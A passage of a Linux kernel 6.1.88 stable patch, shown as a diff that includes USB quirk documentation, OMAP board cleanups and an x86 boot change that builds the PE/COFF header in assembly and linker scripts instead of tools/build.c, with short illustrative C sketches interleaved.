+--- a/Documentation/admin-guide/kernel-parameters.txt
++++ b/Documentation/admin-guide/kernel-parameters.txt
+@@ -6603,6 +6603,9 @@
+ 					pause after every control message);
+ 				o = USB_QUIRK_HUB_SLOW_RESET (Hub needs extra
+ 					delay after resetting its port);
++				p = USB_QUIRK_SHORT_SET_ADDRESS_REQ_TIMEOUT
++					(Reduce timeout of the SET_ADDRESS
++					request from 5000 ms to 500 ms);
+ 			Example: quirks=0781:5580:bk,0a5c:5834:gij
+ 
+ 	usbhid.mousepoll=
+diff --git a/MAINTAINERS b/MAINTAINERS
+index bbfedb0b20938..ecf4d0c8f446e 100644
+--- a/MAINTAINERS
++++ b/MAINTAINERS
+@@ -8031,7 +8031,7 @@ M:	Geoffrey D. Bennett <g@b4.vu>
+ L:	alsa-devel@alsa-project.org (moderated for non-subscribers)
+ S:	Maintained
+ T:	git git://git.kernel.org/pub/scm/linux/kernel/git/tiwai/sound.git
+-F:	sound/usb/mixer_scarlett_gen2.c
++F:	sound/usb/mixer_scarlett2.c
+ 
+ FORCEDETH GIGABIT ETHERNET DRIVER
+ M:	Rain River <rain.1986.08.12@gmail.com>
+diff --git a/Makefile b/Makefile
+index e46a57006a34f..c73cb678fb9ac 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 87
++SUBLEVEL = 88
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/mach-omap2/board-n8x0.c b/arch/arm/mach-omap2/board-n8x0.c
+index 5e86145db0e2a..8897364e550ba 100644
+--- a/arch/arm/mach-omap2/board-n8x0.c
++++ b/arch/arm/mach-omap2/board-n8x0.c
+@@ -22,7 +22,6 @@
+ #include <linux/platform_data/spi-omap2-mcspi.h>
+ #include <linux/platform_data/mmc-omap.h>
+ #include <linux/mfd/menelaus.h>
+-#include <sound/tlv320aic3x.h>
+ 
+ #include <asm/mach/arch.h>
+ #include <asm/mach-types.h>
+@@ -567,10 +566,6 @@ struct menelaus_platform_data n8x0_menelaus_platform_data = {
+ 	.late_init = n8x0_menelaus_late_init,
+ };
+ 
+-struct aic3x_pdata n810_aic33_data = {
+-	.gpio_reset = 118,
+-};
+-
+ static int __init n8x0_late_initcall(void)
+ {
+ 	if (!board_caps)
+diff --git a/arch/arm/mach-omap2/common-board-devices.h b/arch/arm/mach-omap2/common-board-devices.h
+index b23962c38fb27..69694af714751 100644
+--- a/arch/arm/mach-omap2/common-board-devices.h
++++ b/arch/arm/mach-omap2/common-board-devices.h
+@@ -2,12 +2,10 @@
+ #ifndef __OMAP_COMMON_BOARD_DEVICES__
+ #define __OMAP_COMMON_BOARD_DEVICES__
+ 
+-#include <sound/tlv320aic3x.h>
+ #include <linux/mfd/menelaus.h>
+ 
+ void *n8x0_legacy_init(void);
+ 
+ extern struct menelaus_platform_data n8x0_menelaus_platform_data;
+-extern struct aic3x_pdata n810_aic33_data;
+ 
+ #endif /* __OMAP_COMMON_BOARD_DEVICES__ */
+diff --git a/arch/arm/mach-omap2/pdata-quirks.c b/arch/arm/mach-omap2/pdata-quirks.c
+index 5b99d602c87bc..44da1e14a3740 100644
+--- a/arch/arm/mach-omap2/pdata-quirks.c
++++ b/arch/arm/mach-omap2/pdata-quirks.c
+@@ -257,9 +257,19 @@ static struct platform_device pandora_backlight = {
+ 	.id	= -1,
+ };
+ 
++static struct gpiod_lookup_table pandora_soc_audio_gpios = {
++	.dev_id = "soc-audio",
++	.table = {
++		GPIO_LOOKUP("gpio-112-127", 6, "dac", GPIO_ACTIVE_HIGH),
++		GPIO_LOOKUP("gpio-0-15", 14, "amp", GPIO_ACTIVE_HIGH),
++		{ }
++	},
++};
++
+ static void __init omap3_pandora_legacy_init(void)
+ {
+ 	platform_device_register(&pandora_backlight);
++	gpiod_add_lookup_table(&pandora_soc_audio_gpios);
+ }
+ #endif /* CONFIG_ARCH_OMAP3 */
+ 
+@@ -440,7 +450,6 @@ static struct of_dev_auxdata omap_auxdata_lookup[] = {
+ #ifdef CONFIG_MACH_NOKIA_N8X0
+ 	OF_DEV_AUXDATA("ti,omap2420-mmc", 0x4809c000, "mmci-omap.0", NULL),
+ 	OF_DEV_AUXDATA("menelaus", 0x72, "1-0072", &n8x0_menelaus_platform_data),
+-	OF_DEV_AUXDATA("tlv320aic3x", 0x18, "2-0018", &n810_aic33_data),
+ #endif
+ #ifdef CONFIG_ARCH_OMAP3
+ 	OF_DEV_AUXDATA("ti,omap2-iommu", 0x5d000000, "5d000000.mmu",
+diff --git a/arch/arm64/mm/pageattr.c b/arch/arm64/mm/pageattr.c
+index 826cb200b204f..425b398f8d456 100644
+--- a/arch/arm64/mm/pageattr.c
++++ b/arch/arm64/mm/pageattr.c
+@@ -220,9 +220,6 @@ bool kernel_page_present(struct page *page)
+ 	pte_t *ptep;
+ 	unsigned long addr = (unsigned long)page_address(page);
+ 
+-	if (!can_set_direct_map())
+-		return true;
+-
+ 	pgdp = pgd_offset_k(addr);
+ 	if (pgd_none(READ_ONCE(*pgdp)))
+ 		return false;
+diff --git a/arch/x86/boot/Makefile b/arch/x86/boot/Makefile
+index 9e38ffaadb5d9..3c1b3520361c7 100644
+--- a/arch/x86/boot/Makefile
++++ b/arch/x86/boot/Makefile
+@@ -91,7 +91,7 @@ $(obj)/vmlinux.bin: $(obj)/compressed/vmlinux FORCE
+ 
+ SETUP_OBJS = $(addprefix $(obj)/,$(setup-y))
+ 
+-sed-zoffset := -e 's/^\([0-9a-fA-F]*\) [a-zA-Z] \(startup_32\|startup_64\|efi32_stub_entry\|efi64_stub_entry\|efi_pe_entry\|efi32_pe_entry\|input_data\|kernel_info\|_end\|_ehead\|_text\|z_.*\)$$/\#define ZO_\2 0x\1/p'
++sed-zoffset := -e 's/^\([0-9a-fA-F]*\) [a-zA-Z] \(startup_32\|efi.._stub_entry\|efi\(32\)\?_pe_entry\|input_data\|kernel_info\|_end\|_ehead\|_text\|_e\?data\|z_.*\)$$/\#define ZO_\2 0x\1/p'
+ 
+ quiet_cmd_zoffset = ZOFFSET $@
+       cmd_zoffset = $(NM) $< | sed -n $(sed-zoffset) > $@
+diff --git a/arch/x86/boot/compressed/Makefile b/arch/x86/boot/compressed/Makefile
+index 3965b2c9efee0..6e61baff223f8 100644
+--- a/arch/x86/boot/compressed/Makefile
++++ b/arch/x86/boot/compressed/Makefile
+@@ -84,7 +84,7 @@ LDFLAGS_vmlinux += -T
+ hostprogs	:= mkpiggy
+ HOST_EXTRACFLAGS += -I$(srctree)/tools/include
+ 
+-sed-voffset := -e 's/^\([0-9a-fA-F]*\) [ABCDGRSTVW] \(_text\|__bss_start\|_end\)$$/\#define VO_\2 _AC(0x\1,UL)/p'
++sed-voffset := -e 's/^\([0-9a-fA-F]*\) [ABCDGRSTVW] \(_text\|__start_rodata\|__bss_start\|_end\)$$/\#define VO_\2 _AC(0x\1,UL)/p'
+ 
+ quiet_cmd_voffset = VOFFSET $@
+       cmd_voffset = $(NM) $< | sed -n $(sed-voffset) > $@
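For illustration, the widened sed-voffset rule above (like sed-zoffset in the
boot Makefile) amounts to scanning nm(1) output for a fixed list of symbols and
emitting #define lines. A minimal user-space sketch of that filtering — the
symbol list is taken from the hunk, everything else is illustrative:

#include <stdio.h>
#include <string.h>

int main(void)
{
        static const char * const wanted[] = {
                "_text", "__start_rodata", "__bss_start", "_end",
        };
        char line[256];

        /* usage: nm vmlinux | ./voffset */
        while (fgets(line, sizeof(line), stdin)) {
                unsigned long addr;
                char type, name[128];
                unsigned int i;

                if (sscanf(line, "%lx %c %127s", &addr, &type, name) != 3)
                        continue;
                (void)type;
                for (i = 0; i < 4; i++)
                        if (!strcmp(name, wanted[i]))
                                printf("#define VO_%s _AC(0x%lx,UL)\n",
                                       name, addr);
        }
        return 0;
}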
+diff --git a/arch/x86/boot/compressed/misc.c b/arch/x86/boot/compressed/misc.c
+index 8ae7893d712ff..45435ff883635 100644
+--- a/arch/x86/boot/compressed/misc.c
++++ b/arch/x86/boot/compressed/misc.c
+@@ -330,6 +330,7 @@ static size_t parse_elf(void *output)
+ 	return ehdr.e_entry - LOAD_PHYSICAL_ADDR;
+ }
+ 
++const unsigned long kernel_text_size = VO___start_rodata - VO__text;
+ const unsigned long kernel_total_size = VO__end - VO__text;
+ 
+ static u8 boot_heap[BOOT_HEAP_SIZE] __aligned(4);
+diff --git a/arch/x86/boot/compressed/sev.c b/arch/x86/boot/compressed/sev.c
+index d07e665bb265b..3c5d5c97f8f73 100644
+--- a/arch/x86/boot/compressed/sev.c
++++ b/arch/x86/boot/compressed/sev.c
+@@ -118,6 +118,9 @@ static bool fault_in_kernel_space(unsigned long address)
+ #define __init
+ #define __pa(x)	((unsigned long)(x))
+ 
++#undef __head
++#define __head
++
+ #define __BOOT_COMPRESSED
+ 
+ /* Basic instruction decoding support needed */
+diff --git a/arch/x86/boot/compressed/vmlinux.lds.S b/arch/x86/boot/compressed/vmlinux.lds.S
+index 112b2375d021b..bcf0e4e4c98e8 100644
+--- a/arch/x86/boot/compressed/vmlinux.lds.S
++++ b/arch/x86/boot/compressed/vmlinux.lds.S
+@@ -42,11 +42,13 @@ SECTIONS
+ 		*(.rodata.*)
+ 		_erodata = . ;
+ 	}
+-	.data :	{
++	.data :	ALIGN(0x1000) {
+ 		_data = . ;
+ 		*(.data)
+ 		*(.data.*)
+-		*(.bss.efistub)
++
++		/* Add 4 bytes of extra space for a CRC-32 checksum */
++		. = ALIGN(. + 4, 0x200);
+ 		_edata = . ;
+ 	}
+ 	. = ALIGN(L1_CACHE_BYTES);
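The ALIGN(. + 4, 0x200) above reserves four bytes for the CRC-32 and then
rounds _edata up to the new 512-byte file alignment. The same arithmetic as a
stand-alone sketch (the starting offset is made up):

#include <stdio.h>

static unsigned long align_up(unsigned long x, unsigned long a)
{
        return (x + a - 1) & ~(a - 1);  /* a must be a power of two */
}

int main(void)
{
        unsigned long dot = 0x12345;    /* current location counter */
        unsigned long edata = align_up(dot + 4, 0x200);

        printf("_edata = 0x%lx\n", edata);      /* 0x12400 */
        return 0;
}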
+diff --git a/arch/x86/boot/header.S b/arch/x86/boot/header.S
+index d31982509654d..7593339b529a2 100644
+--- a/arch/x86/boot/header.S
++++ b/arch/x86/boot/header.S
+@@ -36,65 +36,19 @@ SYSSEG		= 0x1000		/* historical load address >> 4 */
+ #define ROOT_RDONLY 1
+ #endif
+ 
++	.set	salign, 0x1000
++	.set	falign, 0x200
++
+ 	.code16
+ 	.section ".bstext", "ax"
+-
+-	.global bootsect_start
+-bootsect_start:
+ #ifdef CONFIG_EFI_STUB
+ 	# "MZ", MS-DOS header
+ 	.word	MZ_MAGIC
+-#endif
+-
+-	# Normalize the start address
+-	ljmp	$BOOTSEG, $start2
+-
+-start2:
+-	movw	%cs, %ax
+-	movw	%ax, %ds
+-	movw	%ax, %es
+-	movw	%ax, %ss
+-	xorw	%sp, %sp
+-	sti
+-	cld
+-
+-	movw	$bugger_off_msg, %si
+-
+-msg_loop:
+-	lodsb
+-	andb	%al, %al
+-	jz	bs_die
+-	movb	$0xe, %ah
+-	movw	$7, %bx
+-	int	$0x10
+-	jmp	msg_loop
+-
+-bs_die:
+-	# Allow the user to press a key, then reboot
+-	xorw	%ax, %ax
+-	int	$0x16
+-	int	$0x19
+-
+-	# int 0x19 should never return.  In case it does anyway,
+-	# invoke the BIOS reset code...
+-	ljmp	$0xf000,$0xfff0
+-
+-#ifdef CONFIG_EFI_STUB
+ 	.org	0x3c
+ 	#
+ 	# Offset to the PE header.
+ 	#
+ 	.long	pe_header
+-#endif /* CONFIG_EFI_STUB */
+-
+-	.section ".bsdata", "a"
+-bugger_off_msg:
+-	.ascii	"Use a boot loader.\r\n"
+-	.ascii	"\n"
+-	.ascii	"Remove disk and press any key to reboot...\r\n"
+-	.byte	0
+-
+-#ifdef CONFIG_EFI_STUB
+ pe_header:
+ 	.long	PE_MAGIC
+ 
+@@ -123,30 +77,26 @@ optional_header:
+ 	.byte	0x02				# MajorLinkerVersion
+ 	.byte	0x14				# MinorLinkerVersion
+ 
+-	# Filled in by build.c
+-	.long	0				# SizeOfCode
++	.long	ZO__data			# SizeOfCode
+ 
+-	.long	0				# SizeOfInitializedData
++	.long	ZO__end - ZO__data		# SizeOfInitializedData
+ 	.long	0				# SizeOfUninitializedData
+ 
+-	# Filled in by build.c
+-	.long	0x0000				# AddressOfEntryPoint
++	.long	setup_size + ZO_efi_pe_entry	# AddressOfEntryPoint
+ 
+-	.long	0x0200				# BaseOfCode
++	.long	setup_size			# BaseOfCode
+ #ifdef CONFIG_X86_32
+ 	.long	0				# data
+ #endif
+ 
+ extra_header_fields:
+-	# PE specification requires ImageBase to be 64k aligned
+-	.set	image_base, (LOAD_PHYSICAL_ADDR + 0xffff) & ~0xffff
+ #ifdef CONFIG_X86_32
+-	.long	image_base			# ImageBase
++	.long	0				# ImageBase
+ #else
+-	.quad	image_base			# ImageBase
++	.quad	0				# ImageBase
+ #endif
+-	.long	0x20				# SectionAlignment
+-	.long	0x20				# FileAlignment
++	.long	salign				# SectionAlignment
++	.long	falign				# FileAlignment
+ 	.word	0				# MajorOperatingSystemVersion
+ 	.word	0				# MinorOperatingSystemVersion
+ 	.word	LINUX_EFISTUB_MAJOR_VERSION	# MajorImageVersion
+@@ -155,12 +105,9 @@ extra_header_fields:
+ 	.word	0				# MinorSubsystemVersion
+ 	.long	0				# Win32VersionValue
+ 
+-	#
+-	# The size of the bzImage is written in tools/build.c
+-	#
+-	.long	0				# SizeOfImage
++	.long	setup_size + ZO__end		# SizeOfImage
+ 
+-	.long	0x200				# SizeOfHeaders
++	.long	salign				# SizeOfHeaders
+ 	.long	0				# CheckSum
+ 	.word	IMAGE_SUBSYSTEM_EFI_APPLICATION	# Subsystem (EFI application)
+ #ifdef CONFIG_EFI_DXE_MEM_ATTRIBUTES
+@@ -191,87 +138,77 @@ extra_header_fields:
+ 
+ 	# Section table
+ section_table:
+-	#
+-	# The offset & size fields are filled in by build.c.
+-	#
+ 	.ascii	".setup"
+ 	.byte	0
+ 	.byte	0
+-	.long	0
+-	.long	0x0				# startup_{32,64}
+-	.long	0				# Size of initialized data
+-						# on disk
+-	.long	0x0				# startup_{32,64}
+-	.long	0				# PointerToRelocations
+-	.long	0				# PointerToLineNumbers
+-	.word	0				# NumberOfRelocations
+-	.word	0				# NumberOfLineNumbers
+-	.long	IMAGE_SCN_CNT_CODE		| \
+-		IMAGE_SCN_MEM_READ		| \
+-		IMAGE_SCN_MEM_EXECUTE		| \
+-		IMAGE_SCN_ALIGN_16BYTES		# Characteristics
++	.long	pecompat_fstart - salign 	# VirtualSize
++	.long	salign				# VirtualAddress
++	.long	pecompat_fstart - salign	# SizeOfRawData
++	.long	salign				# PointerToRawData
+ 
+-	#
+-	# The EFI application loader requires a relocation section
+-	# because EFI applications must be relocatable. The .reloc
+-	# offset & size fields are filled in by build.c.
+-	#
+-	.ascii	".reloc"
+-	.byte	0
+-	.byte	0
+-	.long	0
+-	.long	0
+-	.long	0				# SizeOfRawData
+-	.long	0				# PointerToRawData
+-	.long	0				# PointerToRelocations
+-	.long	0				# PointerToLineNumbers
+-	.word	0				# NumberOfRelocations
+-	.word	0				# NumberOfLineNumbers
++	.long	0, 0, 0
+ 	.long	IMAGE_SCN_CNT_INITIALIZED_DATA	| \
+ 		IMAGE_SCN_MEM_READ		| \
+-		IMAGE_SCN_MEM_DISCARDABLE	| \
+-		IMAGE_SCN_ALIGN_1BYTES		# Characteristics
++		IMAGE_SCN_MEM_DISCARDABLE	# Characteristics
+ 
+ #ifdef CONFIG_EFI_MIXED
+-	#
+-	# The offset & size fields are filled in by build.c.
+-	#
+ 	.asciz	".compat"
+-	.long	0
+-	.long	0x0
+-	.long	0				# Size of initialized data
+-						# on disk
+-	.long	0x0
+-	.long	0				# PointerToRelocations
+-	.long	0				# PointerToLineNumbers
+-	.word	0				# NumberOfRelocations
+-	.word	0				# NumberOfLineNumbers
++
++	.long	pecompat_fsize			# VirtualSize
++	.long	pecompat_fstart			# VirtualAddress
++	.long	pecompat_fsize			# SizeOfRawData
++	.long	pecompat_fstart			# PointerToRawData
++
++	.long	0, 0, 0
+ 	.long	IMAGE_SCN_CNT_INITIALIZED_DATA	| \
+ 		IMAGE_SCN_MEM_READ		| \
+-		IMAGE_SCN_MEM_DISCARDABLE	| \
+-		IMAGE_SCN_ALIGN_1BYTES		# Characteristics
++		IMAGE_SCN_MEM_DISCARDABLE	# Characteristics
++
++	/*
++	 * Put the IA-32 machine type and the associated entry point address in
++	 * the .compat section, so loaders can figure out which other execution
++	 * modes this image supports.
++	 */
++	.pushsection ".pecompat", "a", @progbits
++	.balign	salign
++	.globl	pecompat_fstart
++pecompat_fstart:
++	.byte	0x1				# Version
++	.byte	8				# Size
++	.word	IMAGE_FILE_MACHINE_I386		# PE machine type
++	.long	setup_size + ZO_efi32_pe_entry	# Entrypoint
++	.byte	0x0				# Sentinel
++	.popsection
++#else
++	.set	pecompat_fstart, setup_size
+ #endif
+-
+-	#
+-	# The offset & size fields are filled in by build.c.
+-	#
+ 	.ascii	".text"
+ 	.byte	0
+ 	.byte	0
+ 	.byte	0
+-	.long	0
+-	.long	0x0				# startup_{32,64}
+-	.long	0				# Size of initialized data
++	.long	ZO__data
++	.long	setup_size
++	.long	ZO__data			# Size of initialized data
+ 						# on disk
+-	.long	0x0				# startup_{32,64}
++	.long	setup_size
+ 	.long	0				# PointerToRelocations
+ 	.long	0				# PointerToLineNumbers
+ 	.word	0				# NumberOfRelocations
+ 	.word	0				# NumberOfLineNumbers
+ 	.long	IMAGE_SCN_CNT_CODE		| \
+ 		IMAGE_SCN_MEM_READ		| \
+-		IMAGE_SCN_MEM_EXECUTE		| \
+-		IMAGE_SCN_ALIGN_16BYTES		# Characteristics
++		IMAGE_SCN_MEM_EXECUTE		# Characteristics
++
++	.ascii	".data\0\0\0"
++	.long	ZO__end - ZO__data		# VirtualSize
++	.long	setup_size + ZO__data		# VirtualAddress
++	.long	ZO__edata - ZO__data		# SizeOfRawData
++	.long	setup_size + ZO__data		# PointerToRawData
++
++	.long	0, 0, 0
++	.long	IMAGE_SCN_CNT_INITIALIZED_DATA	| \
++		IMAGE_SCN_MEM_READ		| \
++		IMAGE_SCN_MEM_WRITE		# Characteristics
+ 
+ 	.set	section_count, (. - section_table) / 40
+ #endif /* CONFIG_EFI_STUB */
+@@ -285,12 +222,12 @@ sentinel:	.byte 0xff, 0xff        /* Used to detect broken loaders */
+ 
+ 	.globl	hdr
+ hdr:
+-setup_sects:	.byte 0			/* Filled in by build.c */
++		.byte setup_sects - 1
+ root_flags:	.word ROOT_RDONLY
+-syssize:	.long 0			/* Filled in by build.c */
++syssize:	.long ZO__edata / 16
+ ram_size:	.word 0			/* Obsolete */
+ vid_mode:	.word SVGA_MODE
+-root_dev:	.word 0			/* Filled in by build.c */
++root_dev:	.word 0			/* Default to major/minor 0/0 */
+ boot_flag:	.word 0xAA55
+ 
+ 	# offset 512, entry point
+@@ -578,9 +515,25 @@ pref_address:		.quad LOAD_PHYSICAL_ADDR	# preferred load addr
+ # define INIT_SIZE VO_INIT_SIZE
+ #endif
+ 
++	.macro		__handover_offset
++#ifndef CONFIG_EFI_HANDOVER_PROTOCOL
++	.long		0
++#elif !defined(CONFIG_X86_64)
++	.long		ZO_efi32_stub_entry
++#else
++	/* Yes, this is really how we defined it :( */
++	.long		ZO_efi64_stub_entry - 0x200
++#ifdef CONFIG_EFI_MIXED
++	.if		ZO_efi32_stub_entry != ZO_efi64_stub_entry - 0x200
++	.error		"32-bit and 64-bit EFI entry points do not match"
++	.endif
++#endif
++#endif
++	.endm
++
+ init_size:		.long INIT_SIZE		# kernel initialization size
+-handover_offset:	.long 0			# Filled in by build.c
+-kernel_info_offset:	.long 0			# Filled in by build.c
++handover_offset:	__handover_offset
++kernel_info_offset:	.long ZO_kernel_info
+ 
+ # End of setup header #####################################################
+ 
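With build.c no longer patching the header, the fields above become plain
assembler arithmetic over zoffset.h symbols plus the setup_size/setup_sects
symbols exported by the setup.ld change further down. A rough model of that
arithmetic, with made-up symbol values:

#include <stdio.h>

int main(void)
{
        /* illustrative stand-ins for ZO_* and linker-script symbols */
        unsigned long setup_size = 0x5000;      /* 4 KiB-aligned setup */
        unsigned long zo_edata = 0xc2d000;      /* ZO__edata */
        unsigned long zo_end = 0xd00000;        /* ZO__end */

        printf("setup_sects = %lu\n", setup_size / 512);
        printf("syssize     = 0x%lx paragraphs\n", zo_edata / 16);
        printf("SizeOfImage = 0x%lx\n", setup_size + zo_end);
        return 0;
}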
+diff --git a/arch/x86/boot/setup.ld b/arch/x86/boot/setup.ld
+index 49546c247ae25..3a2d1360abb01 100644
+--- a/arch/x86/boot/setup.ld
++++ b/arch/x86/boot/setup.ld
+@@ -10,10 +10,11 @@ ENTRY(_start)
+ SECTIONS
+ {
+ 	. = 0;
+-	.bstext		: { *(.bstext) }
+-	.bsdata		: { *(.bsdata) }
++	.bstext	: {
++		*(.bstext)
++		. = 495;
++	} =0xffffffff
+ 
+-	. = 495;
+ 	.header		: { *(.header) }
+ 	.entrytext	: { *(.entrytext) }
+ 	.inittext	: { *(.inittext) }
+@@ -23,6 +24,9 @@ SECTIONS
+ 	.text		: { *(.text .text.*) }
+ 	.text32		: { *(.text32) }
+ 
++	.pecompat	: { *(.pecompat) }
++	PROVIDE(pecompat_fsize = setup_size - pecompat_fstart);
++
+ 	. = ALIGN(16);
+ 	.rodata		: { *(.rodata*) }
+ 
+@@ -38,8 +42,10 @@ SECTIONS
+ 	.signature	: {
+ 		setup_sig = .;
+ 		LONG(0x5a5aaa55)
+-	}
+ 
++		setup_size = ALIGN(ABSOLUTE(.), 4096);
++		setup_sects = ABSOLUTE(setup_size / 512);
++	}
+ 
+ 	. = ALIGN(16);
+ 	.bss		:
+diff --git a/arch/x86/boot/tools/build.c b/arch/x86/boot/tools/build.c
+index bd247692b7017..10311d77c67f8 100644
+--- a/arch/x86/boot/tools/build.c
++++ b/arch/x86/boot/tools/build.c
+@@ -40,10 +40,6 @@ typedef unsigned char  u8;
+ typedef unsigned short u16;
+ typedef unsigned int   u32;
+ 
+-#define DEFAULT_MAJOR_ROOT 0
+-#define DEFAULT_MINOR_ROOT 0
+-#define DEFAULT_ROOT_DEV (DEFAULT_MAJOR_ROOT << 8 | DEFAULT_MINOR_ROOT)
+-
+ /* Minimal number of setup sectors */
+ #define SETUP_SECT_MIN 5
+ #define SETUP_SECT_MAX 64
+@@ -51,22 +47,7 @@ typedef unsigned int   u32;
+ /* This must be large enough to hold the entire setup */
+ u8 buf[SETUP_SECT_MAX*512];
+ 
+-#define PECOFF_RELOC_RESERVE 0x20
+-
+-#ifdef CONFIG_EFI_MIXED
+-#define PECOFF_COMPAT_RESERVE 0x20
+-#else
+-#define PECOFF_COMPAT_RESERVE 0x0
+-#endif
+-
+-static unsigned long efi32_stub_entry;
+-static unsigned long efi64_stub_entry;
+-static unsigned long efi_pe_entry;
+-static unsigned long efi32_pe_entry;
+-static unsigned long kernel_info;
+-static unsigned long startup_64;
+-static unsigned long _ehead;
+-static unsigned long _end;
++static unsigned long _edata;
+ 
+ /*----------------------------------------------------------------------*/
+ 
+@@ -152,180 +133,6 @@ static void usage(void)
+ 	die("Usage: build setup system zoffset.h image");
+ }
+ 
+-#ifdef CONFIG_EFI_STUB
+-
+-static void update_pecoff_section_header_fields(char *section_name, u32 vma, u32 size, u32 datasz, u32 offset)
+-{
+-	unsigned int pe_header;
+-	unsigned short num_sections;
+-	u8 *section;
+-
+-	pe_header = get_unaligned_le32(&buf[0x3c]);
+-	num_sections = get_unaligned_le16(&buf[pe_header + 6]);
+-
+-#ifdef CONFIG_X86_32
+-	section = &buf[pe_header + 0xa8];
+-#else
+-	section = &buf[pe_header + 0xb8];
+-#endif
+-
+-	while (num_sections > 0) {
+-		if (strncmp((char*)section, section_name, 8) == 0) {
+-			/* section header size field */
+-			put_unaligned_le32(size, section + 0x8);
+-
+-			/* section header vma field */
+-			put_unaligned_le32(vma, section + 0xc);
+-
+-			/* section header 'size of initialised data' field */
+-			put_unaligned_le32(datasz, section + 0x10);
+-
+-			/* section header 'file offset' field */
+-			put_unaligned_le32(offset, section + 0x14);
+-
+-			break;
+-		}
+-		section += 0x28;
+-		num_sections--;
+-	}
+-}
+-
+-static void update_pecoff_section_header(char *section_name, u32 offset, u32 size)
+-{
+-	update_pecoff_section_header_fields(section_name, offset, size, size, offset);
+-}
+-
+-static void update_pecoff_setup_and_reloc(unsigned int size)
+-{
+-	u32 setup_offset = 0x200;
+-	u32 reloc_offset = size - PECOFF_RELOC_RESERVE - PECOFF_COMPAT_RESERVE;
+-#ifdef CONFIG_EFI_MIXED
+-	u32 compat_offset = reloc_offset + PECOFF_RELOC_RESERVE;
+-#endif
+-	u32 setup_size = reloc_offset - setup_offset;
+-
+-	update_pecoff_section_header(".setup", setup_offset, setup_size);
+-	update_pecoff_section_header(".reloc", reloc_offset, PECOFF_RELOC_RESERVE);
+-
+-	/*
+-	 * Modify .reloc section contents with a single entry. The
+-	 * relocation is applied to offset 10 of the relocation section.
+-	 */
+-	put_unaligned_le32(reloc_offset + 10, &buf[reloc_offset]);
+-	put_unaligned_le32(10, &buf[reloc_offset + 4]);
+-
+-#ifdef CONFIG_EFI_MIXED
+-	update_pecoff_section_header(".compat", compat_offset, PECOFF_COMPAT_RESERVE);
+-
+-	/*
+-	 * Put the IA-32 machine type (0x14c) and the associated entry point
+-	 * address in the .compat section, so loaders can figure out which other
+-	 * execution modes this image supports.
+-	 */
+-	buf[compat_offset] = 0x1;
+-	buf[compat_offset + 1] = 0x8;
+-	put_unaligned_le16(0x14c, &buf[compat_offset + 2]);
+-	put_unaligned_le32(efi32_pe_entry + size, &buf[compat_offset + 4]);
+-#endif
+-}
+-
+-static void update_pecoff_text(unsigned int text_start, unsigned int file_sz,
+-			       unsigned int init_sz)
+-{
+-	unsigned int pe_header;
+-	unsigned int text_sz = file_sz - text_start;
+-	unsigned int bss_sz = init_sz - file_sz;
+-
+-	pe_header = get_unaligned_le32(&buf[0x3c]);
+-
+-	/*
+-	 * The PE/COFF loader may load the image at an address which is
+-	 * misaligned with respect to the kernel_alignment field in the setup
+-	 * header.
+-	 *
+-	 * In order to avoid relocating the kernel to correct the misalignment,
+-	 * add slack to allow the buffer to be aligned within the declared size
+-	 * of the image.
+-	 */
+-	bss_sz	+= CONFIG_PHYSICAL_ALIGN;
+-	init_sz	+= CONFIG_PHYSICAL_ALIGN;
+-
+-	/*
+-	 * Size of code: Subtract the size of the first sector (512 bytes)
+-	 * which includes the header.
+-	 */
+-	put_unaligned_le32(file_sz - 512 + bss_sz, &buf[pe_header + 0x1c]);
+-
+-	/* Size of image */
+-	put_unaligned_le32(init_sz, &buf[pe_header + 0x50]);
+-
+-	/*
+-	 * Address of entry point for PE/COFF executable
+-	 */
+-	put_unaligned_le32(text_start + efi_pe_entry, &buf[pe_header + 0x28]);
+-
+-	update_pecoff_section_header_fields(".text", text_start, text_sz + bss_sz,
+-					    text_sz, text_start);
+-}
+-
+-static int reserve_pecoff_reloc_section(int c)
+-{
+-	/* Reserve 0x20 bytes for .reloc section */
+-	memset(buf+c, 0, PECOFF_RELOC_RESERVE);
+-	return PECOFF_RELOC_RESERVE;
+-}
+-
+-static void efi_stub_defaults(void)
+-{
+-	/* Defaults for old kernel */
+-#ifdef CONFIG_X86_32
+-	efi_pe_entry = 0x10;
+-#else
+-	efi_pe_entry = 0x210;
+-	startup_64 = 0x200;
+-#endif
+-}
+-
+-static void efi_stub_entry_update(void)
+-{
+-	unsigned long addr = efi32_stub_entry;
+-
+-#ifdef CONFIG_EFI_HANDOVER_PROTOCOL
+-#ifdef CONFIG_X86_64
+-	/* Yes, this is really how we defined it :( */
+-	addr = efi64_stub_entry - 0x200;
+-#endif
+-
+-#ifdef CONFIG_EFI_MIXED
+-	if (efi32_stub_entry != addr)
+-		die("32-bit and 64-bit EFI entry points do not match\n");
+-#endif
+-#endif
+-	put_unaligned_le32(addr, &buf[0x264]);
+-}
+-
+-#else
+-
+-static inline void update_pecoff_setup_and_reloc(unsigned int size) {}
+-static inline void update_pecoff_text(unsigned int text_start,
+-				      unsigned int file_sz,
+-				      unsigned int init_sz) {}
+-static inline void efi_stub_defaults(void) {}
+-static inline void efi_stub_entry_update(void) {}
+-
+-static inline int reserve_pecoff_reloc_section(int c)
+-{
+-	return 0;
+-}
+-#endif /* CONFIG_EFI_STUB */
+-
+-static int reserve_pecoff_compat_section(int c)
+-{
+-	/* Reserve 0x20 bytes for .compat section */
+-	memset(buf+c, 0, PECOFF_COMPAT_RESERVE);
+-	return PECOFF_COMPAT_RESERVE;
+-}
+-
+ /*
+  * Parse zoffset.h and find the entry points. We could just #include zoffset.h
+  * but that would mean tools/build would have to be rebuilt every time. It's
+@@ -354,14 +161,7 @@ static void parse_zoffset(char *fname)
+ 	p = (char *)buf;
+ 
+ 	while (p && *p) {
+-		PARSE_ZOFS(p, efi32_stub_entry);
+-		PARSE_ZOFS(p, efi64_stub_entry);
+-		PARSE_ZOFS(p, efi_pe_entry);
+-		PARSE_ZOFS(p, efi32_pe_entry);
+-		PARSE_ZOFS(p, kernel_info);
+-		PARSE_ZOFS(p, startup_64);
+-		PARSE_ZOFS(p, _ehead);
+-		PARSE_ZOFS(p, _end);
++		PARSE_ZOFS(p, _edata);
+ 
+ 		p = strchr(p, '\n');
+ 		while (p && (*p == '\r' || *p == '\n'))
+@@ -371,17 +171,14 @@ static void parse_zoffset(char *fname)
+ 
+ int main(int argc, char ** argv)
+ {
+-	unsigned int i, sz, setup_sectors, init_sz;
